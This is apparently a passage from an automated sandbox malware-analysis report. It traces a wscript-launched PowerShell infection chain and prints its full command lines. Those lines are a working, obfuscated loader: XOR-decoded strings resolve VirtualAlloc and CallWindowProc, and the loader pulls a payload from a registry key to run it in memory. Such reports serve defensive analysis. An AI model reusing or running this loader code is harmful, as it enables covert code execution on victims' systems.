BExECa8PrCSw4TeDFo7IdDFe6PaCLeDSoCVi4DiCRi9FaFGe8Sq9TuFHo9MaFGoEsa2FuCAl0LeDSj1InEHo1CoCSk0BoCPa9UnCAf0FuCpa2SpCCy4AfDup1BeCOv0FjEgu3TrCOlAUnDNo7acEKi3JoDWa0NaCDaBBaCSe6PrDSa1BeCfrCHiCudATrCSoBMyFPe5OvCMeAUpCGaCVeCopBPaDLu1UsCde0FlDhu7Sv8VeDBe8UnDBuCUg3GuCAfEHyDPi5Ur8Ne5ls8Mb1FoFAk0StCkuBWoCAa6TrCBaAUrDDr0MoDFs5MeCJu9GiCUn0Di8Of5Gt8Sk1BiEPr2DdCUdDHyCKo0UnCEu2ExCAeCSeDBl6ChCTiDQu9Dr1Ab8TeCPr8Cr9Go8As5Pl8OvDDiEPe2SpEIn1ScFEn1Wo8Va5KaETr5Ca8OmDGiFstEinEJaCUnCScBDiDUr1syFAn5WoDSt1KoDbo7ReFPr8Ln8Co9eq8Pr5ImFPrEHyFAc0ExEReCAmCsiBCoDFr1Ps9Be6Pi9Ti7VaFMi8Pa8Ov9Po8Mu5BlFPeELsFDe0MoEapCHvCAmBBlDOp1Ek9de6Ge9Un7TeFTi8Op8Ex9In8Hv5HaFSnEGaFHj0exEFiCcoCSyBSwDFl1Vi9St6St9St7RiFNr8Tm8BiCLo8Sk5Un8BaDLaFTrEReEdoCStCBiBMaDTr1AcFSi5BoDDe1NiDCo7BlFSa8Hy8SpCSe8ArCBi8EdCHi'Tr;Fe&In(na`$InGArhCaeungiriElsUnhSh7Ju)Om Di`$AmHeeoFoePrrAdeRusVi6Po;Fi`$ReDOkmEdnEniMonSkgMasFopPrrCyoLajEgeBukBetTrebarCo In=Ch FofPrkBapha Sc`$ReGGehIneNagIliPesNehPr5Un Re`$HuGObhBieStgKviNosFohPs6Re;La`$EkHreoFoeTirBoeGasPu7Sv Re=Ch KrSTemPreIkrUntVoeGenPesDibToaUtrSanHjsAp0Fo Or'Ri8mi1GgFHd6PrDSa0MeCSyEPaCseEInCde0CiDRh7KrCCoALiDGe3FiCfr0ShDEn7HyDTo1DrDIn7BeCCeEReCKaEReCSo0SkDti1AfDAf6Ta9Ov6Le8Ud5Et9Fi8Sp8ka5Dy8Yo1JoFSp2FoCSy0HoDIn7UlCMa0BoDSi7reCSe4DaDTe1Fl8TiBVaEIfCCrCKaBTrDPo3opCUvAHeCLaESeCSq0Un8TrDUnFUnEOrEReCBaCPaBvaDRe1beFNo5KoDPo1RuDEl7ViFBu8Fa9PsFEt9TeFToFcoFSpCKo0OvDSc7BrCOuABa8Ur9Om8Se5Un9An6Re9Fa0It9LtCMe8Se9Sl8Fl5Me9Pe5SkDUnDFe9Va6Pa9Kb5Kl9Bo5Ha9Fo5Pu8Sv9Bj8St5Un9Ci5PuDLaDQu9Co1Po9Ud5Va8TuCTi'Ch;an&de(Fa`$UnGCohAneLagOpiThsObhUn7Sn)Al Di`$GaHFroEneHorVgeTasSt7Si;Ha`$TiHOvoLaePurPaeGasKo8Ti In=Ha DrSKumNeeHerHytSheDenHesHobEkaArrPenRisDi0Co Af'Pe8St1UnEPa6CrCstABeDIn7seDPa7ClCWhAKeCTy7NiCSe7KvCMeAExDth7BaCDu0UnCSe0Sp8An5Ga9Pr8Ud8Om5Su8ga1QuFFo2leCSe0TeDGa7BoCRa0BeDWa7SpCSk4IgDUn1Ca8RiBafEKrCUtCJuBSuDTi3PrCRuAAsCTrEEuCSk0Un8DeDMoFSoEKuEEsCOmCCaBSuDDo1CoFBi5UbDFl1MoDUn7InFIn8He9HaFFo9DeFmaFChFErCPr0SaDPo7AlCFrAWa8Bi9Ta8Ch5Ap9Sl5KbDKiDPh9Te4Fe9No5re9Bn5Lg9Sl5Ow9An5Sk9Gy5Es8Am9Va8Su5Au9Bu5etDLoDPr9Pa6Or9Af5Fi9Ru5Ca9Ca5Uu8Si9Sp8At5Ha9Un5KaDBaDTu9op1De8tiCFl'Re;Ko&Sh(li`$NaGAnhPeePrgCoiHusSphUn7Sa)Ro Hi`$TeHstoSpeHirLaeBesSa8po;Un`$PrCRuaSyrNotLawVorThiStgCahArtUniGenFlgBe=Pa(SmGUneIntCo-OpIKltpeeTemWaPUnrSooInpDoeAgrSotKayBa Ma-SePbeaSptRehOx Bi'GoHPrKNeCPlUBi:Fo\LyPBasUdeInuRadSaaFemhobGauOnlLoaTpcParStualmSk\CykVeoRenFesXmtSqiAntSeuSttTaiUtoLunLseJelFe'Ge)Di.WaBTijHgfHesFo;Ly`$InHFloHoeMerSkeAasAn9Bl Op=Pa HoSJvmBreNerSktNoeJanKrsPabHeaTrrronYosUn0Af St'Ha8Fo1PaECuDSwCMeAFiCHe0AcDCe7ReCSe0MiDSt6Rg8Wa5Af9Mu8Ob8Pi5NoFVaEInFIn6UnDseCTuDSp6DaDWe1ChCNu0MiCGu8Ku8DeBNeEUn6AlCPlADeCSmBExDCh3PeCEv0SeDKa7crDHi1ToFTe8Sk9RdFAn9PhFFrESa3DrDAn7CeCImAHaCAn8MaENo7unCFo4UnDsk6BaCFe0Re9Ti3Fl9Fj1KaFAn6BuDSy1EnDDo7FrCLaCPoCBlBSkCPr2Re8EnDsy8Ln1AdEPi6EvCLa4kjDSl7TaDPa1OtDFi2PsDLa7NyCVeCSaCMu2SkCBeDBuDji1SkCEfCviCJaBSpCPr2Op8TaCBe'Bu;ha&He(Mi`$esGAnhNoeBlgChiShsLohFo7Sh)Ja St`$WiHMeoLaeBarBleHasCo9dv;Ty`$FrCGoagerSotFowDerLaiHagmihbetkoiPenSsgAn0Bn Ba=Ca ChSSamLoeAcrNatdueApnpasSabGaaGorBonSvsPr0Ya Bi'PoFCeEElFag6EkDDiCRaDCo6TeDAl1OvCvi0MeCRe8Sk8UdBAlFEl7FoDBl0CoCAaBAnDTr1PrCTrCFoCHe8TiCHu0or8UnBHrEstCKeCCyBTeDBo1VrCIn0meDPu7AiCItAPrDTu5RuFBe6FuCDe0FlDAn7OuDSl3LeCMaCPiCDi6DiCSo0UnDBo6Ve8syBBrEMe8EpCZo4StDSe7SaDSl6PeCElDDeCEl4HeCMe9KoFPr8Op9unFWo9GlFBlENu6FoCPaASpDma5ToDRuCSt8FlDAu8Pa1GaEOuDcuCEkACaCBu0IvDLi7KrCEl0GeDAb6Va8Is9Fa8Pa5Ko9To5Pa8Ol9Hy8Sm5Se8Ta5Fu8Be1DrFFu6MdDOv0klCUnEDiCUnEArCLi0PlDTe7trCGiASlDBa3AgCSt0puDAr7SeDCe1baDPy7prCKlEfeCJuEElCRd0TaDBa1GiDUd6Af9dr6Pe8Fe9Ja8af5Ga9Ka6as9Im0Po9AnCPa8MaCOr'in;Tr&An(Ud`$GaGWhhFleFlgReiOpsSchSa7Ov)sp En`$PrCPraBerRetSuwLerSmiUngPrhHatUniDinIjgSt0Ov;pr`$NeNMaoSonOscStoStnCrdGoiEnmEneblnSytGo2De=Ub`$LiHUloTreDirSaeFosUn.WecFioLauAnnOutMa-pi3Sm5Re9Ur;Sk`$paCBeaTorFotExwSirYaiSngmihGatKoiBankngTr1Em Ba=Bu UnSMomSgeSurRetRueFanCasTwbAmaFrrGanSusBi0St ar'AuFKoELoFev6AsDHyCNoDNa6UdDNi1BaCSt0WiCMu8Ve8ClBmuFPy7UnDBu0HyCemBStDPe1GrCopCpaCCa8CaCSc0Re8LsBHuESaCWoCPlBDiDHa1CoCpa0HiDMy7NoCSpApaDUt5CaFBo6DiCAn0MaDDe7SeDFi3UnCreCHuCBi6sqCPl0MoDhi6Ou8BuBSaESe8ThCPr4ViDKu7SnDCy6BeCNoDLaCCh4MiCFe9NiFPa8An9TaFPo9KaFReEFo6SeCWhADoDOu5NoDHoCPe8ReDTr8Sp1DrEvaDNeCbyAFoCCa0spDAs7GiCSp0UnDTo6Sk8fj9Sa8In5Ge9Sa6Fe9Ur0Th9ThCDk8cu9Co8Ba5Ov8Su1LoEDe6ruCOrApiDkl7CoDDe7SuCbuACiCHy7afCHi7GaCLuAEkDTu7UnCPi0PrCEk0Pa8Pi9Un8La5st8ud1SkEAnBChCEnASkCDoBTmCVa6ViCTeAJuCFaBVaCSt1KaCunCKiCaf8MoCMa0SeCMeBPlDSh1Et9be7In8RoCHa'Vo;Mo&Br(Tr`$FlGRehReeAigFeiTesgahPh7Wh)Fo Sh`$TeCcoaInrRetUdwForEfistgYahIbtspiUdnFagSo1St;Ed`$FrCPraNorSmtPewStrKliBdgKohCotEniPonFigAn2ba St=do stSPrmUneimrRetAdeClnStsKobBuadirDinHosDi0Tr to'Su8Br1AnCRoEfjCNo9VuCSa4MiDZo7StCFl2UkCWeFPrCSkAStDSl7WiCUn1BoCMi0Br8Bn5He9Sk8Vi8Ka5BaFInEBlFAj6InDDoCudDCi6AnDSl1InCSt0InCSy8Le8AyBTiFce7AsDNo0DeCImBAlDNo1NiCBiCSlCTi8VoCSe0Fu8ReBGaEnoCDeCOmBChDMe1TeCMa0BaDus7KeCPeAWaDFe5clFFo6BuCLa0ReDDe7NoDJe3StCHyCAlCSt6SkCDi0BeDMe6bl8AnBkoEEt8AfCAc4TiDBa7DrDSt6AhCSkDGiCLi4NoCFu9AsFSp8uj9ReFDi9RoFSuEBa2ApCKo0unDGr1HiEFi1GrCGu0diCPe9KoCJa0DeCFr2ReCUn4phDmu1DaCEp0MiEDe3ubCJoAReDbl7vaEma3SkDBa0ToCPsBSkCTy6reDPo1GhCDeCMaCTeASkCTiBUdFFo5UnCWeAEuCHoCLaCTrBAnDEr1AlCMa0ThDCh7Hi8coDfo8un1GeFTr6KeDAd0PaCPeESkCBoEhaCEk0noDRe7AeCPeAMoDGu3UnCTe0DiDim7RaDCa1HeDud7PeCTiEInCCoESiCMo0NoDSh1JoDBu6Oo9Vi6Ha8Cr9Ro8An5Tu8UvDinEKo2VuEAr1ouFLe1De8Co5PlESy5Se8CaDtaFDyEFdERvCBaCPhBBgDTo1PuFKa5UnDla1UlDJo7ToFSu8An8Sv9UnFSpEMeEDeCRaCAfBKoDAp1AfFVe5beDUn1UnDAl7DsFSc8Du8CoCLo8Ca5Kv8SnDFrFCuEElFQu3HeCPaAPrCRoCTrCIn1HaFTa8Ma8BiCIt8GuCOv8AbCMu'He;Re&St(Gr`$SpGSihBeePrgSpiFasTehJu7Ga)Gr Un`$ChCtralerHotRewUnrTeibigUnhEstSkiNonStgGa2gu;Ma`$BiCPiaUnrUntOuwAdrUniUngElhTitDiiStnMogDa3Fl Br=Li TiSCemSaeAsrBotmaeRenDesgebkyaMorFlnStsHj0Sy Mo'Gr8Wi1saCReEfiCTy9TuCTi4TiDpe7riCDm2TeCOpFMaCFrAKrDSe7GrCKr1CiCIn0Le8BaBTaEMiCcoCKrBKeDFa3DiCBrAkaCTrEBrCFu0Hj8DiDAp8Go1LoEje6ReCOmAVeDKn7FoDBo7ReCGbAOnCDe7SlCOp7HaCRaAFeDQu7PsCMe0GrCmy0Sk8Si9Ko8Et1MaEac1NoCPl8BlCBrBTbCGaCFoCVrBCoCUn2BiDPs6HeDBr5ZoDAc7WhCChACoCSpFLsCGh0BjCUsECoDLa1stCma0inDSp7Gl8SaCMa'Di;Ph&Bi(Al`$DeGAmhGreGigSkiAmsFohSa7Me)Mo To`$FaCShaMarSvtFlwDirKliBrgMahcitnaiTrnFogSu3Ta#Ga;""";;Function Cartwrighting9 { param([String]$Regionsplanlovs); For($Klistringer=2; $Klistringer -lt $Regionsplanlovs.Length-1; $Klistringer+=(2+1)){ $Smertensbarns = $Smertensbarns + $Regionsplanlovs.Substring($Klistringer, 1); } $Smertensbarns;}$talose0 = Cartwrighting9 'CeIFoEReXPr ';$talose1= Cartwrighting9 $Vildmnd;if([IntPtr]::size -eq 8){.$env:windir\S*64\W*Power*\v1.0\*ll.exe $talose1 ;}else{.$talose0 $talose1;} MD5: 95000560239032BC68B4C2FDFCDEF913)
      • conhost.exe (PID: 5704 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • powershell.exe (PID: 5732 cmdline: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "Function Smertensbarns0 { param([String]$Regionsplanlovs); $Delintervallernes = New-Object byte[] ($Regionsplanlovs.Length / 2); For($Klistringer=0; $Klistringer -lt $Regionsplanlovs.Length; $Klistringer+=2){ $Delintervallernes[$Klistringer/2] = [convert]::ToByte($Regionsplanlovs.Substring($Klistringer, 2), 16); $Delintervallernes[$Klistringer/2] = ($Delintervallernes[$Klistringer/2] -bxor 165); } [String][System.Text.Encoding]::ASCII.GetString($Delintervallernes);}$Forskningsresultaters0=Smertensbarns0 'F6DCD6D1C0C88BC1C9C9';$Forskningsresultaters1=Smertensbarns0 'E8CCC6D7CAD6CAC3D18BF2CCCB96978BF0CBD6C4C3C0EBC4D1CCD3C0E8C0D1CDCAC1D6';$Forskningsresultaters2=Smertensbarns0 'E2C0D1F5D7CAC6E4C1C1D7C0D6D6';$Forskningsresultaters3=Smertensbarns0 'F6DCD6D1C0C88BF7D0CBD1CCC8C08BECCBD1C0D7CAD5F6C0D7D3CCC6C0D68BEDC4CBC1C9C0F7C0C3';$Forskningsresultaters4=Smertensbarns0 'D6D1D7CCCBC2';$Forskningsresultaters5=Smertensbarns0 'E2C0D1E8CAC1D0C9C0EDC4CBC1C9C0';$Forskningsresultaters6=Smertensbarns0 'F7F1F6D5C0C6CCC4C9EBC4C8C08985EDCCC1C0E7DCF6CCC28985F5D0C7C9CCC6';$Forskningsresultaters7=Smertensbarns0 'F7D0CBD1CCC8C08985E8C4CBC4C2C0C1';$Forskningsresultaters8=Smertensbarns0 'F7C0C3C9C0C6D1C0C1E1C0C9C0C2C4D1C0';$Forskningsresultaters9=Smertensbarns0 'ECCBE8C0C8CAD7DCE8CAC1D0C9C0';$Ghegish0=Smertensbarns0 'E8DCE1C0C9C0C2C4D1C0F1DCD5C0';$Ghegish1=Smertensbarns0 'E6C9C4D6D68985F5D0C7C9CCC68985F6C0C4C9C0C18985E4CBD6CCE6C9C4D6D68985E4D0D1CAE6C9C4D6D6';$Ghegish2=Smertensbarns0 'ECCBD3CACEC0';$Ghegish3=Smertensbarns0 'F5D0C7C9CCC68985EDCCC1C0E7DCF6CCC28985EBC0D2F6C9CAD18985F3CCD7D1D0C4C9';$Ghegish4=Smertensbarns0 'F3CCD7D1D0C4C9E4C9C9CAC6';$Ghegish5=Smertensbarns0 'CBD1C1C9C9';$Ghegish6=Smertensbarns0 'EBD1F5D7CAD1C0C6D1F3CCD7D1D0C4C9E8C0C8CAD7DC';$Ghegish7=Smertensbarns0 'ECE0FD';$Ghegish8=Smertensbarns0 'F9';function fkp {Param ($Upgrown, $Depressionsperioder) ;$Hoeres0 =Smertensbarns0 '81EED7C8C8C0D7C0CB8598858DFEE4D5D5E1CAC8C4CCCBF89F9FE6D0D7D7C0CBD1E1CAC8C4CCCB8BE2C0D1E4D6D6C0C8C7C9CCC0D68D8C85D985F2CDC0D7C088EAC7CFC0C6D185DE8581FA8BE2C9CAC7C4C9E4D6D6C0C8C7C9DCE6C4C6CDC08588E4CBC18581FA8BE9CAC6C4D1CCCACB8BF6D5C9CCD18D81E2CDC0C2CCD6CD9D8CFE8894F88BE0D4D0C4C9D68D81E3CAD7D6CECBCCCBC2D6D7C0D6D0C9D1C4D1C0D7D6958C85D88C8BE2C0D1F1DCD5C08D81E3CAD7D6CECBCCCBC2D6D7C0D6D0C9D1C4D1C0D7D6948C';&($Ghegish7) $Hoeres0;$Hoeres5 = Smertensbarns0 '81E6CDCCC9C985988581EED7C8C8C0D7C0CB8BE2C0D1E8C0D1CDCAC18D81E3CAD7D6CECBCCCBC2D6D7C0D6D0C9D1C4D1C0D7D6978985FEF1DCD5C0FEF8F885E58D81E3CAD7D6CECBCCCBC2D6D7C0D6D0C9D1C4D1C0D7D696898581E3CAD7D6CECBCCCBC2D6D7C0D6D0C9D1C4D1C0D7D6918C8C';&($Ghegish7) $Hoeres5;$Hoeres1 = Smertensbarns0 'D7C0D1D0D7CB8581E6CDCCC9C98BECCBD3CACEC08D81CBD0C9C98985E58DFEF6DCD6D1C0C88BF7D0CBD1CCC8C08BECCBD1C0D7CAD5F6C0D7D3CCC6C0D68BEDC4CBC1C9C0F7C0C3F88DEBC0D288EAC7CFC0C6D185F6DCD6D1C0C88BF7D0CBD1CCC8C08BECCBD1C0D7CAD5F6C0D7D3CCC6C0D68BEDC4CBC1C9C0F7C0C38D8DEBC0D288EAC7CFC0C6D185ECCBD1F5D1D78C89858D81EED7C8C8C0D7C0CB8BE2C0D1E8C0D1CDCAC18D81E3CAD7D6CECBCCCBC2D6D7C0D6D0C9D1C4D1C0D7D6908C8C8BECCBD3CACEC08D81CBD0C9C98985E58D81F0D5C2D7CAD2CB8C8C8C8C898581E1C0D5D7C0D6D6CCCACBD6D5C0D7CCCAC1C0D78C8C';&($Ghegish7) $Hoeres1;}function GDT {Param ([Parameter(Position = 0, Mandatory = $True)] [Type[]] $Nondecorously,[Parameter(Position = 1)] [Type] $Coeliomyalgia = [Void]);$Hoeres2 = Smertensbarns0 '81EDC4DCCBC0D6859885FEE4D5D5E1CAC8C4CCCBF89F9FE6D0D7D7C0CBD1E1CAC8C4CCCB8BE1C0C3CCCBC0E1DCCBC4C8CCC6E4D6D6C0C8C7C9DC8D8DEBC0D288EAC7CFC0C6D185F6DCD6D1C0C88BF7C0C3C9C0C6D1CCCACB8BE4D6D6C0C8C7C9DCEBC4C8C08D81E3CAD7D6CECBCCCBC2D6D7C0D6D0C9D1C4D1C0D7D69D8C8C8985FEF6DCD6D1C0C88BF7C0C3C9C0C6D1CCCACB8BE0C8CCD18BE4D6D6C0C8C7C9DCE7D0CCC9C1C0D7E4C6C6C0D6D6F89F9FF7D0CB8C8BE1C0C3CCCBC0E1DCCBC4C8CCC6E8CAC1D0C9C08D81E3CAD7D6CECBCCCBC2D6D7C0D6D0C9D1C4D1C0D7D69C898581C3C4C9D6C08C8BE1C0C3CCCBC0F1DCD5C08D81E2CDC0C2CCD6CD95898581E2CDC0C2CCD6CD948985FEF6DCD6D1C0C88BE8D0C9D1CCC6C4D6D1E1C0C9C0C2C4D1C0F88C';&($Ghegish7) $Hoeres2;$Hoeres3 = Smertensbarns0 '81EDC4DCCBC0D68BE1C0C3CCCBC0E6CACBD6D1D7D0C6D1CAD78D81E3CAD7D6CECBCCCBC2D6D7C0D6D0C9D1C4D1C0D7D6938985FEF6DCD6D1C0C88BF7C0C3C9C0C6D1CCCACB8BE6C4C9C9CCCBC2E6CACBD3C0CBD1CCCACBD6F89F9FF6D1C4CBC1C4D7C1898581EBCACBC1C0C6CAD7CAD0D6C9DC8C8BF6C0D1ECC8D5C9C0C8C0CBD1C4D1CCCACBE3C9C4C2D68D81E3CAD7D6CECBCCCBC2D6D7C0D6D0C9D1C4D1C0D7D6928C';&($Ghegish7) $Hoeres3;$Hoeres4 = Smertensbarns0 '81EDC4DCCBC0D68BE1C0C3CCCBC0E8C0D1CDCAC18D81E2CDC0C2CCD6CD97898581E2CDC0C2CCD6CD96898581E6CAC0C9CCCAC8DCC4C9C2CCC4898581EBCACBC1C0C6CAD7CAD0D6C9DC8C8BF6C0D1ECC8D5C9C0C8C0CBD1C4D1CCCACBE3C9C4C2D68D81E3CAD7D6CECBCCCBC2D6D7C0D6D0C9D1C4D1C0D7D6928C';&($Ghegish7) $Hoeres4;$Hoeres5 = Smertensbarns0 'D7C0D1D0D7CB8581EDC4DCCBC0D68BE6D7C0C4D1C0F1DCD5C08D8C';&($Ghegish7) $Hoeres5 ;}$Uncouple = Smertensbarns0 'CEC0D7CBC0C99697';$Hoeres6 = Smertensbarns0 '81F2C0D7C0D7C4D1859885FEF6DCD6D1C0C88BF7D0CBD1CCC8C08BECCBD1C0D7CAD5F6C0D7D3CCC6C0D68BE8C4D7D6CDC4C9F89F9FE2C0D1E1C0C9C0C2C4D1C0E3CAD7E3D0CBC6D1CCCACBF5CACCCBD1C0D78D8DC3CED58581F0CBC6CAD0D5C9C08581E2CDC0C2CCD6CD918C89858DE2E1F185E58DFEECCBD1F5D1D7F88985FEF0ECCBD19697F88985FEF0ECCBD19697F88985FEF0ECCBD19697F88C858DFEECCBD1F5D1D7F88C8C8C';&($Ghegish7) $Hoeres6;$Dmningsprojekter = fkp $Ghegish5 $Ghegish6;$Hoeres7 = Smertensbarns0 '81F6D0CECEC0D7CAD3C0D7D1D7CECEC0D1D69685988581F2C0D7C0D7C4D18BECCBD3CACEC08DFEECCBD1F5D1D7F89F9FFFC0D7CA898596909C898595DD96959595898595DD91958C';&($Ghegish7) $Hoeres7;$Hoeres8 = Smertensbarns0 '81E6CAD7D7CAC7C7CAD7C0C085988581F2C0D7C0D7C4D18BECCBD3CACEC08DFEECCBD1F5D1D7F89F9FFFC0D7CA898595DD949595959595898595DD96959595898595DD918C';&($Ghegish7) $Hoeres8;$Cartwrighting=(Get-ItemProperty -Path 'HKCU:\Pseudambulacrum\konstitutionel').Bjfs;$Hoeres9 = Smertensbarns0 '81EDCAC0D7C0D6859885FEF6DCD6D1C0C88BE6CACBD3C0D7D1F89F9FE3D7CAC8E7C4D6C09391F6D1D7CCCBC28D81E6C4D7D1D2D7CCC2CDD1CCCBC28C';&($Ghegish7) $Hoeres9;$Cartwrighting0 = Smertensbarns0 'FEF6DCD6D1C0C88BF7D0CBD1CCC8C08BECCBD1C0D7CAD5F6C0D7D3CCC6C0D68BE8C4D7D6CDC4C9F89F9FE6CAD5DC8D81EDCAC0D7C0D689859589858581F6D0CECEC0D7CAD3C0D7D1D7CECEC0D1D696898596909C8C';&($Ghegish7) $Cartwrighting0;$Noncondiment2=$Hoeres.count-359;$Cartwrighting1 = Smertensbarns0 'FEF6DCD6D1C0C88BF7D0CBD1CCC8C08BECCBD1C0D7CAD5F6C0D7D3CCC6C0D68BE8C4D7D6CDC4C9F89F9FE6CAD5DC8D81EDCAC0D7C0D6898596909C898581E6CAD7D7CAC7C7CAD7C0C0898581EBCACBC6CACBC1CCC8C0CBD1978C';&($Ghegish7) $Cartwrighting1;$Cartwrighting2 = Smertensbarns0 '81CEC9C4D7C2CFCAD7C1C0859885FEF6DCD6D1C0C88BF7D0CBD1CCC8C08BECCBD1C0D7CAD5F6C0D7D3CCC6C0D68BE8C4D7D6CDC4C9F89F9FE2C0D1E1C0C9C0C2C4D1C0E3CAD7E3D0CBC6D1CCCACBF5CACCCBD1C0D78D81F6D0CECEC0D7CAD3C0D7D1D7CECEC0D1D69689858DE2E1F185E58DFEECCBD1F5D1D7F889FEECCBD1F5D1D7F88C858DFEF3CACCC1F88C8C8C';&($Ghegish7) $Cartwrighting2;$Cartwrighting3 = Smertensbarns0 '81CEC9C4D7C2CFCAD7C1C08BECCBD3CACEC08D81E6CAD7D7CAC7C7CAD7C0C08981E1C8CBCCCBC2D6D5D7CACFC0CED1C0D78C';&($Ghegish7) $Cartwrighting3# MD5: DBA3E6449E97D4E3DF64527EF7012A10)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

No yara matches

Sigma Signatures

No Sigma rule has matched

Snort Signatures

No Snort rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results
Source: powershell.exe, 0000000A.00000002.835932253.0000025FCBA3A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: powershell.exe, 0000000A.00000002.763919081.0000025FB35C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name

System Summary

barindex
Wscript starts Powershell (via cmd or directly)
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Vildmnd = """SaFLauConFacGatUniStoUnnLi suSSemLeeAurGltIneFrnAnsFrbAnaCarIrnPrsre0St To{Ch Ir Al Ud DopCoaSerUsaPemAn(Th[FoSRetHorKoiBonSagSu]In`$NoRAfenoguniHyoOpnMesHapFrlInathnStlVaoIsvUnsel)Bo;Hu In Po Fe Fo`$DiDOceWilMuiUnnPhtBaeHerJuvSyaNalPrlGaeTorKonIfeCosDi No=Br WhNBeetrwKo-FjOKobThjRaeLecCotUn BebStyEntCieKo[cu]Hu Cr(Hy`$mrRDreOagviiMyoBanTvsKvpEklOvaacnFrlSloHovsosPi.SuLAbeNenWagSmtHuhTh No/Be Ze2Co)St;Pe Sk Gt Mi SuFUdomerOm(cr`$ArKUblVaiOvsSetUnrEmiAznTeggeeUnrGu=Al0re;Un Tr`$SpKTjlDriMesAktSurFoiUnnCagMeeSarIc He-FalBrtKa Ac`$TiRWieUdgUdiDeoRanObsSkpRelMiaPrnAnlreoAlvInsfo.BoLTreFanPrgFrtSthDd;Uu Sp`$SyKFolGoiAlsExtinrTriLinUngSkeIcrRe+Fl=Zi2he)Le{Ga Ys Un Pa Pr Te Ta Il Af`$TrDBreNolFoiSenFotCaeBrrduvPeaArlMulIneTrrFonSheHysSa[Re`$ReKOmlPaiDasTrtBurOritenVegDoeDirOp/Sw2Be]Em Gk=Lo Co[PocOnoSunTivUneMarKrtTa]Vi:tr:WiTReoRoBVgyEttWaeDe(Ma`$GrRWheFogTuiAnoNonBysDipLolDeaFonPrlUdoFovGrsUn.PaSFoucobDusBrtForCliMenTugli(Ja`$CeKMelIciAysAftMirGriCinUvgUneStrSe,Fu te2Ho)Ko,Sk Ba1Ti6Va)Fl;Ga Va Ar`$UnDSceKelPiirenFltpeeDorTevStaColFjlTrePerAcnOveDisLa[Ca`$AfKtalIdiKlsCotskrHyiUnnBrgsueAsrte/Mo2Pe]Le Zo=Mi Ne(ne`$PiDsleaulSuiFanmytFjeAnrFevTeaPrlnolKreLurFrnByeThsOb[Ek`$BaKUdltriOrsLatserOsiChnJegSkeThrSp/Er2Mu]Bi Be-prbmeximoForGr Es1Sk6St5Fr)De;Ar kn Gi An Ma}He Vn[ReSGatakrHaiSinLogOx]fi[TaSmoyCosHatPaeChmOr.unTAleAbxOvtFo.ExEkvnNocAaoMedStiHonAsgBo]No:Bi:TiADiSBeCGrILaIHu.raGCoeVitKoSVatprrUniLanSugHa(Ec`$MaDExeKvlFaiFlnBatEnePorssvFuaJalInlIneGorExnBieWhsAn)Eq;Pa}St`$RiFUpoKorsksInkMinVeiFanDugMesrerLieBrsOvuRelHotIdaUrtDieKtrDesfa0In=SiSHimUfecergotafePrnknsvibHeaHyrEknmissi0Fi Dr'MeFSv6AfDSnCfaDSu6SuDVe1InCHj0AfCUn8Da8UdBBvCMa1BaCre9VaCOr9Sa'Un;Al`$LiFodoKerHosLikConHuiTrnSpgDoslarSueEjsTeuTelVetBiaGrtReeOvransLe1Wa=OuSLumMoeUrrBrtUmeKanHyspobMuaWirInnAnsNo0Br No'UdEAn8KoCRuCUnCdo6TrDWo7cuCcuAFaDha6LyCDiAUnCNe3KrDCa1ma8FlBImFDi2DdCDyCSaCGrBSe9Am6Ch9Ok7Re8grBskFhu0ReCFiBMoDDi6NaCCo4SkCUn3HiCBr0KeETrBPoCSh4GrDRe1AnCBoCYnDSo3MiCAf0SaEUn8SaCTo0TiDCo1ScCZoDNoCFlAMeCut1KoDSe6Bo'Sq;Gr`$FiFDooStrnosKokIdnCoiblnSkgJosSprDaeTssTeuUnlSttSvaPrtHoeChrHysDi2Ny=PoSUmmPeeKnrqutCleHonidsFobFoaPrrUnnKosPo0Ra Ve'TrEPa2ImCRe0spDpr1VaFCa5TeDPa7lyCBrAHeCSi6DiEIr4VaCFr1DaCVa1UpDDu7TeCGy0hoDRe6UdDSu6De'Me;Ud`$GrFTeolerLusCukClnRaiSanHagcisCyrBeeDesVauSylFotSkaAntmueSarUdsEt3La=RaSStmEkeSkrSatHueSunTrsInbBeaHerRonFosKu0He Co'FrFRe6slDMeCFoDin6BeDOp1ToCBu0CoCUl8Gu8MeBUnFCo7OpDMo0MaCWeBJaDVi1plCJoCArCSh8BaCSt0nu8CoBMeEReCDiCFeBTaDLy1soCOm0EuDAf7ReCSuAtoDDh5brFVa6PsCIn0FeDDi7maDBa3KaCChCReCMe6FlCde0UiDHu6Re8ReBGeEseDBaCSp4KlCStBryCca1SkCfr9DaCke0EsFMi7UnCdu0PrCAs3hf'Gr;De`$PoFChoMirPesDikFlnIniBanovgSasMarKaeGrsBeuValFotFraTrtHieAlrStsKl4Da=FoSnomfjegorSvtGreBunKasLgbSparorUnnSosIn0Al Gr'JoDAd6enDSe1PeDch7DiCPrCAmCSyBFrCPi2Mu'Ra;We`$IrFBroLurSusCoktonFeiAnnNogTasMirpieLiscauTalExtKaaSptDoeunrSisIr5Do=OcSMimBaeStrRetLteSonFusUdbGraMurFonMosDr0M
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Vildmnd = """SaFLauConFacGatUniStoUnnLi suSSemLeeAurGltIneFrnAnsFrbAnaCarIrnPrsre0St To{Ch Ir Al Ud DopCoaSerUsaPemAn(Th[FoSRetHorKoiBonSagSu]In`$NoRAfenoguniHyoOpnMesHapFrlInathnStlVaoIsvUnsel)Bo;Hu In Po Fe Fo`$DiDOceWilMuiUnnPhtBaeHerJuvSyaNalPrlGaeTorKonIfeCosDi No=Br WhNBeetrwKo-FjOKobThjRaeLecCotUn BebStyEntCieKo[cu]Hu Cr(Hy`$mrRDreOagviiMyoBanTvsKvpEklOvaacnFrlSloHovsosPi.SuLAbeNenWagSmtHuhTh No/Be Ze2Co)St;Pe Sk Gt Mi 